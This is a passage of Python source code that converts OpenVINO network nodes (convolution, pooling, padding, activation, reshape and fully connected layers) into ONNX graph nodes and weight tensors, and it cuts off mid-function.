errmsg=\"ERROR: Node {}: pad channels at beginning of buffer not supported\\n\"\n sys.stderr.write(errmsg.format(vinode.name))\n sys.exit(1)\n if vinode.data['pad_mode'] != 'constant':\n errmsg=\"ERROR: Node {}: Only pad mode 'constant' is supported'\"\n sys.stderr.write(errmsg.format(vinode.name))\n sys.exit(1)\n if float(vinode.data['pad_value']) != 0.0:\n errmsg=\"ERROR: Node {}: Only pad value of zero\"\n sys.stderr.write(errmsg.format(vinode.name))\n sys.exit(1)\n\n\n value_tensor = onnx.helper.make_tensor('value_{}'.format(buf),\n onnx.TensorProto.FLOAT,\n (1,),\n [0])\n\n pads_tensor = onnx.helper.make_tensor('pad_{}'.format(vinode.id),\n onnx.TensorProto.INT64,\n np.asarray(pads).shape,\n pads)\n inits.append(pads_tensor)\n inits.append(value_tensor)\n\n inputs.append('pad_{}'.format(vinode.id))\n inputs.append('value_{}'.format(vinode.id))\n\n node = onnx.helper.make_node('Pad',\n inputs=inputs,\n outputs=outputs,\n mode='constant',\n name=str(vinode.id))\n nodes.append(node)\n return nodes, inits\n\n\ndef gen_input(vinode):\n nodes, inits = [], []\n return nodes, inits\n\n\ndef gen_conv(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n pads = as_int(vinode.data['pads_begin']) + as_int(vinode.data['pads_end'])\n\n node = onnx.helper.make_node(\n 'Conv',\n inputs=inputs,\n outputs=outputs,\n group = as_int(vinode.data['group']),\n strides = as_int(vinode.data['strides']),\n dilations = as_int(vinode.data['dilations']),\n 
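# ONNX expects pads ordered [begins..., ends...], matching pads_begin + pads_end above\n        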
kernel_shape = as_int(vinode.data['kernel']),\n pads = pads,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n\n if vinode.weights:\n length = vinode.weights['arr'].shape[0]\n kernel_shape = as_int(vinode.data['kernel'])\n output_channels = as_int(vinode.data['output'])\n\n input_channels = int(length / output_channels / kernel_shape[0] / kernel_shape[1])\n weights_shape = (output_channels, input_channels, kernel_shape[0], kernel_shape[1])\n\n tensor = onnx.helper.make_tensor('W{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n weights_shape,\n trunc(vinode.weights['arr']).tolist(),\n )\n inits.append(tensor)\n if vinode.biases:\n tensor = onnx.helper.make_tensor('b{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (as_int(vinode.data['output']),),\n trunc(vinode.biases['arr']).tolist(),\n )\n inits.append(tensor)\n\n\n return nodes, inits\ndef auto_pad_calc(auto_pad,input_shape,kernel_size,stride,dilations):\n pads=[0 for i in range(4)]\n if auto_pad in (\"SAME_UPPER\",\"SAME_LOWER\"):\n def calc_pad(in_shape,kern,stride):\n out_shape = np.ceil(in_shape/stride)\n pad = (out_shape-1)*stride + kern -in_shape\n return pad\n \n dilated_kernel_size0 = (kernel_size[0]-1)*dilations[0]+1\n dilated_kernel_size1 = (kernel_size[1]-1)*dilations[1]+1\n\n pad = calc_pad(input_shape[2],dilated_kernel_size0,stride[0])\n pads[0] = np.ceil(pad/2)\n pads[2] = np.floor(pad/2)\n \n pad = calc_pad(input_shape[3],dilated_kernel_size1,stride[1])\n pads[1] = np.ceil(pad/2)\n pads[3] = np.floor(pad/2)\n if auto_pad == \"SAME_UPPER\":\n #swap back and front\n pads = pads[2:] + pads[:2]\n return [int(p) for p in pads]\n \n \n\ndef gen_conv_10(vinode, bias_vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n node_id = vinode.id\n if bias_vinode:\n bias_inputs, bias_outputs = io(bias_vinode)\n node_id = bias_vinode.id\n\n buf = outputs[0]\n node_outputs = outputs\n if bias_vinode:\n buf = bias_outputs[0]\n node_outputs = bias_outputs\n\n weights = vinodes[int(inputs[1])]\n inputs = inputs[:-1] + ['W{}'.format(node_id)]\n if bias_vinode:\n biases = vinodes[int(bias_inputs[1])]\n inputs += ['b{}'.format(node_id)]\n \n if 'auto_pad' in vinode.data:\n auto_pad = vinode.data['auto_pad'].upper()\n pads = auto_pad_calc(auto_pad,\n vinode.input[0],\n as_int(weights.data['shape'])[-2:],\n as_int(vinode.data['strides']),\n as_int(vinode.data['dilations']))\n else:\n auto_pad = None\n pads = as_int(vinode.data['pads_begin']) + as_int(vinode.data['pads_end'])\n\n node = onnx.helper.make_node(\n 'Conv',\n inputs = inputs,\n outputs = node_outputs,\n strides = as_int(vinode.data['strides']),\n dilations = as_int(vinode.data['dilations']),\n kernel_shape = as_int(weights.data['shape'])[-2:],\n pads = pads,\n name = str(node_id),\n )\n nodes.append(node)\n\n if weights:\n tensor = onnx.helper.make_tensor('W{}'.format(node_id),\n onnx.TensorProto.FLOAT,\n as_int(weights.data['shape']),\n trunc(weights.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n if bias_vinode and biases:\n tensor = onnx.helper.make_tensor('b{}'.format(node_id),\n onnx.TensorProto.FLOAT,\n as_int(biases.data['shape'])[1:2],\n trunc(biases.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n\n return nodes, inits\n\n\ndef gen_group_conv_10(vinode, bias_vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n node_id = vinode.id\n if bias_vinode:\n bias_inputs, bias_outputs = io(bias_vinode)\n node_id = bias_vinode.id\n\n buf = outputs[0]\n node_outputs = outputs\n if bias_vinode:\n buf = bias_outputs[0]\n 
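# when a Const+Add bias pair follows, the conv writes straight to the Add node's output buffer so the bias folds into this single ONNX Conv\n 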
node_outputs = bias_outputs\n\n weights = vinodes[int(inputs[1])]\n inputs = inputs[:-1] + ['W{}'.format(node_id)]\n if bias_vinode:\n biases = vinodes[int(bias_inputs[1])]\n inputs += ['b{}'.format(node_id)]\n\n if 'auto_pad' in vinode.data:\n auto_pad = vinode.data['auto_pad'].upper()\n pads = auto_pad_calc(auto_pad,\n vinode.input[0],\n as_int(weights.data['shape'])[-2:],\n as_int(vinode.data['strides']),\n as_int(vinode.data['dilations']))\n else:\n auto_pad = None\n pads = as_int(vinode.data['pads_begin']) + as_int(vinode.data['pads_end'])\n\n kernel_shape = as_int(weights.data['shape'])\n kernel_shape = [kernel_shape[0] * kernel_shape[1]] + kernel_shape[2:3] + kernel_shape[-2:]\n node = onnx.helper.make_node(\n 'Conv',\n inputs = inputs,\n outputs = node_outputs,\n group = as_int(weights.data['shape'])[0],\n strides = as_int(vinode.data['strides']),\n dilations = as_int(vinode.data['dilations']),\n kernel_shape = as_int(weights.data['shape'])[-2:],\n pads = pads,\n name = str(node_id),\n )\n nodes.append(node)\n\n\n if weights:\n tensor = onnx.helper.make_tensor('W{}'.format(node_id),\n onnx.TensorProto.FLOAT,\n kernel_shape,\n trunc(weights.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n if bias_vinode and biases:\n tensor = onnx.helper.make_tensor('b{}'.format(node_id),\n onnx.TensorProto.FLOAT,\n as_int(biases.data['shape'])[1:2],\n trunc(biases.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\ndef gen_maxpool_10(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n pads = as_int(vinode.data['pads_begin']) + as_int(vinode.data['pads_end'])\n\n ceil_mode = 0\n if 'rounding_type' in vinode.data and vinode.data['rounding_type'] == 'ceil':\n ceil_mode = 1\n\n node = onnx.helper.make_node(\n 'MaxPool',\n inputs=inputs,\n outputs=outputs,\n strides = as_int(vinode.data['strides']),\n kernel_shape = as_int(vinode.data['kernel']),\n # auto_pad = \"SAME_UPPER\",\n pads = pads,\n ceil_mode = ceil_mode,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_avgpool_10(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n pads = as_int(vinode.data['pads_begin']) + as_int(vinode.data['pads_end'])\n\n ceil_mode = 0\n if 'rounding_type' in vinode.data and vinode.data['rounding_type'] == 'ceil':\n ceil_mode = 1\n\n node = onnx.helper.make_node(\n 'AveragePool',\n inputs=inputs,\n outputs=outputs,\n strides = as_int(vinode.data['strides']),\n kernel_shape = as_int(vinode.data['kernel']),\n # auto_pad = \"SAME_UPPER\",\n pads = pads,\n ceil_mode = ceil_mode,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_reduce_10(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n idims = vinode.input[0]\n odims = vinode.output[0]\n keep_dims = True\n if 'keep_dims' in vinode.data and vinode.data['keep_dims'] == 'False':\n keep_dims = False\n assert(not keep_dims or odims[-2:] == (1, 1))\n\n if keep_dims:\n node = onnx.helper.make_node(\n 'AveragePool',\n inputs=inputs[:1],\n outputs=outputs,\n kernel_shape = list(idims[-2:]),\n name = str(vinode.id),\n )\n nodes.append(node)\n else:\n buf = outputs[0]\n _buf = outputs[0] + '_f'\n flatten_output = '{}_flat'.format(vinode.id)\n node = onnx.helper.make_node(\n 'AveragePool',\n inputs=inputs[:1],\n outputs=[_buf],\n kernel_shape = list(idims[-2:]),\n name = _buf,\n )\n nodes.append(node)\n node = onnx.helper.make_node(\n 'Flatten',\n inputs=[_buf],\n outputs=outputs,\n name = buf,\n )\n nodes.append(node)\n\n return 
nodes, inits\n\n\ndef gen_multiply_10(vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n assert(len(inputs) == 2)\n constant_input = [is_constant(vinodes[int(i)], vinodes) for i in inputs]\n if constant_input[0]:\n weights = vinodes[int(inputs[0])]\n inputs = inputs[1:]\n elif constant_input[1]:\n weights = vinodes[int(inputs[1])]\n inputs = inputs[:-1]\n else:\n print('error, non-const multiply not implemented')\n\n inputs = inputs + ['W{}'.format(vinode.id)]\n\n node = onnx.helper.make_node(\n 'Mul',\n inputs=inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n\n if weights:\n tensor = onnx.helper.make_tensor('W{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n as_int(weights.data['shape'])[1:],\n trunc(weights.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\ndef gen_add_10(vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n is_const = False\n for input in inputs:\n input_vinode = [_ for _ in vinodes if str(_.id) == input][0]\n if input_vinode.type == 'Const':\n is_const = True\n\n if not is_const:\n node = onnx.helper.make_node(\n 'Sum',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n )\n nodes.append(node)\n else:\n biases = vinodes[int(inputs[1])]\n if biases:\n inputs = inputs[:-1] + ['b{}'.format(vinode.id)]\n\n node = onnx.helper.make_node(\n 'Add',\n inputs=inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n\n if biases:\n tensor = onnx.helper.make_tensor('b{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n as_int(biases.data['shape'])[1:],\n trunc(biases.data['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\ndef gen_relu(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n if vinode.data and 'negative_slope' in vinode.data:\n slope = float(vinode.data['negative_slope'])\n node = onnx.helper.make_node(\n 'LeakyRelu',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n alpha=slope,\n )\n\n else:\n node = onnx.helper.make_node(\n 'Relu',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n )\n\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_prelu(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n inputs = inputs[:1]\n\n assert(int(vinode.data['channel_shared']) == 0)\n slope = onnx.helper.make_tensor('slope_{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (vinode.weights['arr'].shape[0], 1, 1),\n vinode.weights['arr'].tolist())\n inits.append(slope)\n inputs.append('slope_{}'.format(vinode.id))\n\n node = onnx.helper.make_node(\n 'PRelu',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\ndef gen_prelu_10(vinode, vinodes):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n\n data_node = vinodes[int(inputs[1])]\n if data_node.type != 'Const':\n sys.stderr.write(\"ERROR:Non-constant weights in Prelu node {} not supported\\n\".format(vinode.name))\n sys.exit(1)\n\n inputs = inputs[0:1]\n\n if data_node.data['shape'] == '1':\n slope = float(data_node.data['arr'][0])\n node = onnx.helper.make_node(\n 'LeakyRelu',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n alpha=slope,\n )\n nodes.append(node)\n else:\n\n slope = onnx.helper.make_tensor('slope_{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (data_node.data['arr'].shape[0], 1, 1),\n data_node.data['arr'].tolist())\n inits.append(slope)\n\n inputs.append('slope_{}'.format(vinode.id))\n\n 
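# the slope initializer is shaped (C, 1, 1) above so PRelu broadcasts one slope per channel across H and W\n 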
node = onnx.helper.make_node(\n 'PRelu',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_elu(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n alpha = float(vinode.data['alpha'])\n node = onnx.helper.make_node(\n 'Elu',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n alpha=alpha,\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_const(vinode):\n nodes, inits = [], []\n\n tensor = onnx.helper.make_tensor('{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n vinode.custom['arr'].shape,\n vinode.custom['arr'].tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\n# this function is no longer used with the darknet_to_onnx tool\ndef gen_extract(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n stride, stride = as_int(vinode.data['strides'])\n assert(stride == 2)\n dims = vinode.input[0]\n dims = tuple([-1] + list(dims)[1:])\n\n reshape_1 = np.array([dims[0], dims[1], dims[2]//stride, stride, dims[3]//stride, stride], dtype=np.int64)\n transpose_1 = [0,1,2,4,3,5]\n tensor = onnx.helper.make_tensor('shape_1_{}'.format(vinode.id),\n onnx.TensorProto.INT64,\n reshape_1.shape,\n reshape_1.tolist(),\n )\n inits.append(tensor)\n node = onnx.helper.make_node(\n 'Reshape',\n inputs=[inputs[0], 'shape_1_{}'.format(vinode.id)],\n outputs=['reshape_1_{}'.format(vinode.id)],\n name = str('reshape_1_{}'.format(vinode.id))\n )\n nodes.append(node)\n node = onnx.helper.make_node(\n 'Transpose',\n inputs=['reshape_1_{}'.format(vinode.id)],\n outputs=['transpose_1_{}'.format(vinode.id)],\n perm = transpose_1,\n name = str('transpose_1_{}'.format(vinode.id))\n )\n nodes.append(node)\n\n reshape_2 = np.array([dims[0], dims[1], dims[2]//stride*dims[2]//stride, stride*stride], dtype=np.int64)\n transpose_2 = [0,1,3,2]\n tensor = onnx.helper.make_tensor('shape_2_{}'.format(vinode.id),\n onnx.TensorProto.INT64,\n reshape_2.shape,\n reshape_2.tolist(),\n )\n inits.append(tensor)\n node = onnx.helper.make_node(\n 'Reshape',\n inputs=['transpose_1_{}'.format(vinode.id), 'shape_2_{}'.format(vinode.id)],\n outputs=['reshape_2_{}'.format(vinode.id)],\n name = str('reshape_2_{}'.format(vinode.id))\n )\n nodes.append(node)\n node = onnx.helper.make_node(\n 'Transpose',\n inputs=['reshape_2_{}'.format(vinode.id)],\n outputs=['transpose_2_{}'.format(vinode.id)],\n perm = transpose_2,\n name = str('transpose_2_{}'.format(vinode.id))\n )\n nodes.append(node)\n\n reshape_3 = np.array([dims[0], dims[1], stride*stride, dims[2]//stride, dims[2]//stride], dtype=np.int64)\n transpose_3 = [0,2,1,3,4]\n tensor = onnx.helper.make_tensor('shape_3_{}'.format(vinode.id),\n onnx.TensorProto.INT64,\n reshape_3.shape,\n reshape_3.tolist(),\n )\n inits.append(tensor)\n node = onnx.helper.make_node(\n 'Reshape',\n inputs=['transpose_2_{}'.format(vinode.id), 'shape_3_{}'.format(vinode.id)],\n outputs=['reshape_3_{}'.format(vinode.id)],\n name = str('reshape_3_{}'.format(vinode.id))\n )\n nodes.append(node)\n node = onnx.helper.make_node(\n 'Transpose',\n inputs=['reshape_3_{}'.format(vinode.id)],\n outputs=['transpose_3_{}'.format(vinode.id)],\n perm = transpose_3,\n name = str('transpose_3_{}'.format(vinode.id))\n )\n nodes.append(node)\n\n reshape_4 = np.array([dims[0], dims[1]*stride*stride, dims[2]//stride, dims[2]//stride], dtype=np.int64)\n tensor = onnx.helper.make_tensor('shape_4_{}'.format(vinode.id),\n onnx.TensorProto.INT64,\n reshape_4.shape,\n 
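# final shape folds the stride*stride blocks into the channel dimension: (N, C*s*s, H/s, H/s)\n 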
reshape_4.tolist(),\n )\n inits.append(tensor)\n node = onnx.helper.make_node(\n 'Reshape',\n inputs=['transpose_3_{}'.format(vinode.id), 'shape_4_{}'.format(vinode.id)],\n outputs=outputs,\n name = str(vinode.id)\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_flatten(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n node = onnx.helper.make_node(\n 'Flatten',\n inputs=inputs[:1], # TODO\n outputs=outputs,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_clamp(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n\n min_clip = onnx.helper.make_tensor('min_{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (),\n vals=np.float32(vinode.data['min']).tobytes(),\n raw=True,\n )\n inits.append(min_clip)\n inputs.append('min_{}'.format(vinode.id))\n\n max_clip = onnx.helper.make_tensor('max_{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (),\n vals=np.float32(vinode.data['max']).tobytes(),\n raw=True,\n )\n inits.append(max_clip)\n inputs.append('max_{}'.format(vinode.id))\n\n node = onnx.helper.make_node(\n 'Clip',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_interp(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n factor = float(vinode.data['factor'])\n if factor == 1.0:\n #for some reason this node was inserted in deeplabv3,\n #exchange it for identity\n return gen_identity(vinode)\n if not vinode.data['align_corners']:\n sys.stderr.write('WARNING: Node{}: align_corners not set in openvino interp node. Forcing to be align corners')\n mode = 'linear'\n roi = onnx.helper.make_tensor('roi{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (0,), [])\n\n\n inits.append(roi)\n inputs.append('roi{}'.format(vinode.id))\n scales = np.array([1.0, 1.0, factor, factor], dtype=np.float32)\n tensor = onnx.helper.make_tensor('s{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n scales.shape,\n scales.tolist(),\n )\n inits.append(tensor)\n inputs.append('s{}'.format(vinode.id))\n\n node = onnx.helper.make_node('Resize',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n mode = mode,\n coordinate_transformation_mode=\"align_corners\")\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_interpolate(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n inputs = inputs[:1]\n idims = vinode.input[0]\n odims = vinode.output[0]\n factor0 = float(odims[-2]) / float(idims[-2])\n factor1 = float(odims[-1]) / float(idims[-1])\n assert(factor0 == factor1)\n factor = factor0\n\n if factor == 1.0:\n return gen_identity(vinode)\n mode = vinode.data['mode']\n assert(mode in ['linear', 'nearest'])\n\n if not vinode.data['align_corners']:\n sys.stderr.write('WARNING: Node{}: align_corners not set in openvino interp node. 
Forcing to be align corners')\n roi = onnx.helper.make_tensor('roi{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (0,), [])\n\n inits.append(roi)\n inputs.append('roi{}'.format(vinode.id))\n scales = np.array([1.0, 1.0, factor, factor], dtype=np.float32)\n tensor = onnx.helper.make_tensor('s{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n scales.shape,\n scales.tolist(),\n )\n inits.append(tensor)\n inputs.append('s{}'.format(vinode.id))\n\n node = onnx.helper.make_node('Resize',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n mode = mode,\n coordinate_transformation_mode=\"align_corners\")\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_resample(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n assert(vinode.data['type'] == 'caffe.ResampleParameter.NEAREST')\n assert(vinode.data['height'] == '0')\n assert(vinode.data['width'] == '0')\n assert(vinode.data['antialias'] == '0')\n\n factor = vinode.data['factor']\n mode = 'nearest'\n roi = onnx.helper.make_tensor('roi{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (0,), [])\n\n\n inits.append(roi)\n inputs.append('roi{}'.format(vinode.id))\n\n scales = np.array([1.0, 1.0, factor, factor], dtype=np.float32)\n\n tensor = onnx.helper.make_tensor('s{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n scales.shape,\n scales.tolist(),\n )\n inits.append(tensor)\n inputs.append('s{}'.format(vinode.id))\n\n node = onnx.helper.make_node(\n 'Resize',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n mode = mode,\n )\n nodes.append(node)\n\n\n return nodes, inits\n\n\ndef gen_pooling(vinode):\n # TODO confirm padding\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n pads = as_int(vinode.data['pads_begin']) + as_int(vinode.data['pads_end'])\n\n ceil_mode = 0\n if 'rounding_type' in vinode.data and vinode.data['rounding_type'] == 'ceil':\n ceil_mode = 1\n\n if vinode.data['pool-method'] == 'max':\n node = onnx.helper.make_node(\n 'MaxPool',\n inputs=inputs,\n outputs=outputs,\n strides = as_int(vinode.data['strides']),\n kernel_shape = as_int(vinode.data['kernel']),\n # auto_pad = \"SAME_UPPER\",\n pads = pads,\n ceil_mode = ceil_mode,\n name = str(vinode.id),\n )\n nodes.append(node)\n elif vinode.data['pool-method'] == 'avg':\n count_include_pad = 0\n if 'exclude-pad' in vinode.data and vinode.data['exclude-pad'] == 'false':\n count_include_pad = 1\n\n node = onnx.helper.make_node(\n 'AveragePool',\n inputs=inputs,\n outputs=outputs,\n strides = as_int(vinode.data['strides']),\n kernel_shape = as_int(vinode.data['kernel']),\n pads = pads,\n ceil_mode = ceil_mode,\n count_include_pad = count_include_pad,\n name = str(vinode.id),\n )\n nodes.append(node)\n else:\n print('WARNING', vinode.data['pool-method'])\n\n return nodes, inits\n\n\ndef gen_eltwise(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n\n\n if vinode.data['operation'] == 'sum':\n node = onnx.helper.make_node(\n 'Sum',\n inputs=inputs,\n outputs=outputs,\n name = str(vinode.id),\n )\n nodes.append(node)\n else:\n raise RuntimeError('Node {} Error: Unsupported eltwise operation'.format(vinode.id))\n\n return nodes, inits\n\n\ndef gen_concat(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n axis = int(vinode.data['axis'])\n\n if axis != 1:\n errmsg=\"ERROR: Node {}: Concatenating on axis {}. 
Concat nodes only supported with axis == 1\\n\"\n sys.stderr.write(errmsg.format(vinode.name,axis))\n sys.exit(1)\n\n node = onnx.helper.make_node(\n 'Concat',\n inputs=inputs,\n outputs=outputs,\n axis=axis,\n name=buf,\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_norm(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n inputs = inputs[:1]\n\n alpha = float(vinode.data['alpha'])\n beta = float(vinode.data['beta'])\n nsize = int(vinode.data['size'])\n\n node = onnx.helper.make_node(\n 'LRN',\n inputs=inputs,\n outputs=outputs,\n alpha=alpha,\n beta=beta,\n size=nsize,\n name=buf,\n )\n nodes.append(node)\n\n return nodes, inits\n\n\ndef gen_scaleshift(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n _buf = outputs[0] + '_ss'\n\n if vinode.weights and vinode.biases:\n mul_inputs = [inputs[0], inputs[1]]\n mul_outputs = [_buf]\n add_inputs = [_buf, inputs[2]]\n\n node = onnx.helper.make_node(\n 'Mul',\n inputs=mul_inputs,\n outputs=mul_outputs,\n name=_buf,\n )\n nodes.append(node)\n\n node = onnx.helper.make_node(\n 'Add',\n inputs=add_inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n elif vinode.weights:\n node = onnx.helper.make_node(\n 'Mul',\n inputs=inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n elif vinode.biases:\n node = onnx.helper.make_node(\n 'Add',\n inputs=inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n\n # only compare shapes when both weights and biases exist; either may be absent\n if vinode.weights and vinode.biases:\n assert(vinode.weights['arr'].shape == vinode.biases['arr'].shape)\n arr = vinode.weights['arr'] if vinode.weights else vinode.biases['arr']\n assert(arr.ndim == 1)\n shape = (arr.shape[0], 1, 1)\n\n if vinode.weights:\n tensor = onnx.helper.make_tensor('W{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n shape,\n trunc(vinode.weights['arr']).tolist(),\n )\n inits.append(tensor)\n\n if vinode.biases:\n tensor = onnx.helper.make_tensor('b{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n shape,\n trunc(vinode.biases['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\n\ndef gen_reshape(vinode):\n nodes, inits = [], []\n\n if len(one_elem(vinode.output)):\n\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n inputs = inputs[:1]\n inputs.append('reshape_{}'.format(vinode.id))\n\n node = onnx.helper.make_node(\n 'Reshape',\n inputs=inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n\n\n val = list(one_elem(vinode.output))\n val = [-1] + val[1:]\n tensor = onnx.helper.make_tensor('reshape_{}'.format(vinode.id),\n onnx.TensorProto.INT64,\n np.asarray(vinode.output[0]).shape,\n val,\n )\n inits.append(tensor)\n\n return nodes, inits\n\ndef gen_mul1(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n mul_buf = 'W{}'.format(vinode.id)\n mul_inputs = [inputs[0], mul_buf]\n\n tensor = onnx.helper.make_tensor(mul_buf,\n onnx.TensorProto.FLOAT,\n (1,),\n [1.],\n )\n inits.append(tensor)\n node = onnx.helper.make_node(\n 'Mul',\n inputs=mul_inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n\n return nodes, inits\n\ndef gen_power(vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n\n assert(float(vinode.data['power']) == 1.0)\n shift = float(vinode.data['shift'])\n scale = float(vinode.data['scale'])\n\n mul_buf = 'W{}'.format(vinode.id)\n tensor = onnx.helper.make_tensor(mul_buf,\n onnx.TensorProto.FLOAT,\n (1,),\n [scale],\n )\n inits.append(tensor)\n\n bias_buf = 'b{}'.format(vinode.id)\n tensor = onnx.helper.make_tensor(bias_buf,\n onnx.TensorProto.FLOAT,\n (1,),\n 
[shift],\n )\n inits.append(tensor)\n\n _buf = outputs[0] + '_ss'\n mul_inputs = [inputs[0], mul_buf]\n mul_outputs = [_buf]\n add_inputs = [_buf, bias_buf]\n\n node = onnx.helper.make_node(\n 'Mul',\n inputs=mul_inputs,\n outputs=mul_outputs,\n name=_buf,\n )\n nodes.append(node)\n\n node = onnx.helper.make_node(\n 'Add',\n inputs=add_inputs,\n outputs=outputs,\n name=buf,\n )\n nodes.append(node)\n\n return nodes, inits\n\ndef gen_fullyconnected(vinode, prev_vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n _buf = outputs[0] + '_f'\n\n dims = vinode.output[0]\n prev_dims = prev_vinode.output[0]\n if len(dims) != len(prev_dims):\n flatten_inputs = [inputs[0]]\n flatten_outputs = [_buf]\n gemm_inputs = [_buf] + inputs[1:]\n\n node = onnx.helper.make_node(\n 'Flatten',\n inputs=flatten_inputs,\n outputs=flatten_outputs,\n name=_buf,\n )\n nodes.append(node)\n\n node = onnx.helper.make_node(\n 'Gemm',\n inputs=gemm_inputs,\n outputs=outputs,\n transB=1,\n name=buf,\n )\n nodes.append(node)\n else:\n node = onnx.helper.make_node(\n 'Gemm',\n inputs=inputs,\n outputs=outputs,\n transB=1,\n name=buf,\n )\n nodes.append(node)\n\n length = vinode.weights['arr'].shape[0]\n output_size = as_int(vinode.data['out-size'])\n input_size = int(length / output_size)\n\n if vinode.weights:\n tensor = onnx.helper.make_tensor('W{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (output_size, input_size),\n trunc(vinode.weights['arr']).tolist(),\n )\n inits.append(tensor)\n if vinode.biases:\n tensor = onnx.helper.make_tensor('b{}'.format(vinode.id),\n onnx.TensorProto.FLOAT,\n (output_size,),\n trunc(vinode.biases['arr']).tolist(),\n )\n inits.append(tensor)\n\n return nodes, inits\n\ndef gen_matmul(vinode, prev_vinode):\n nodes, inits = [], []\n inputs, outputs = io(vinode)\n buf = outputs[0]\n _buf = outputs[0] + '_f'\n\n dims = vinode.output[0]\n prev_dims = prev_vinode.output[0]\n\n if len(dims) != len(prev_dims):\n flatten_inputs = [inputs[0]]\n flatten_outputs = [_buf]\n gemm_inputs = [_buf] + inputs[1:]\n\n node = 